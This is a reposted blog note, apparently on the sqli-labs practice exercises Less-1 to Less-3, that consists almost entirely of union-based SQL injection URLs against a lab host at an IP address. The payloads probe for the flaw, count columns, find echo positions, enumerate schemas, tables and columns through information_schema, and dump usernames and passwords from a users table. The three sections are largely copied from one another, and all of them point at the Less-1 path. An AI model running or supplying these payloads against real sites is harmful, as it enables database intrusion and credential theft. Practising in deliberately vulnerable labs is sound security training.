sql injection 1 to 3

Others 2021-03-28 20:57:06 views: null

sql injection exercise

Less-1

1.http://112.126.63.198/Less-1/?id=1' Determine whether there is SQL injection (character injection)
2.http://112.126.63.198/Less-1/?id=1' order by 3–+ How many columns are in the query
3. http://112.126.63.198/Less-1/?id=0'union select 1,2,3 Determine the echo position
3. http://112.126.63.198/Less-1/?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ query database name information
4.http://112.126.63.198 /Less-1/?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+Query table name
5. select group_concat(column_name) from information_schema.columns where table_name='users' Query the column name in users in security
select group_concat(password) from security.users
select group_concat(username) from security.users
Get username and password

Less-2

1. http://112.126.63.198/Less-1/?id=1' Determine whether there is SQL injection (error report, there is an injection point) (numerical injection)
2.http://112.126.63.198/Less-1/ ?id=1' order by 3–+ How many columns are in the query
3. http://112.126.63.198/Less-1/?id=0'union select 1,2,3 Determine the echo position
3. http://112.126.63.198/Less-1/?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ query database name information
4.http://112.126.63.198 /Less-1/?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+query table name
5. select group_concat(column_name) from information_schema.columns where table_name='users' query column name
select group_concat(password) from security.users
select group_concat(username) from security.users
Get username and password

Less-3

1.http://112.126.63.198/Less-1/?id=1' Determine whether there is SQL injection (error report, there is an injection point)
?id=1 and 1=2 No error is reported, not numeric
2.http:/ /112.126.63.198/Less-1/?id=1' order by 3--+ How many columns are in the query
3. http://112.126.63.198/Less-1/?id=0'union select 1,2,3 judgment Echo position
3. http://112.126.63.198/Less-1/?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ query database name information
4.http://112.126.63.198 /Less-1/?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+query table name
5. select group_concat(column_name) from information_schema.columns where table_name='users' query column name
select group_concat(password) from security.users
select group_concat(username) from security.users to
get the username and password

Guess you like

Origin blog.csdn.net/weixin_50998641/article/details/110248270
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com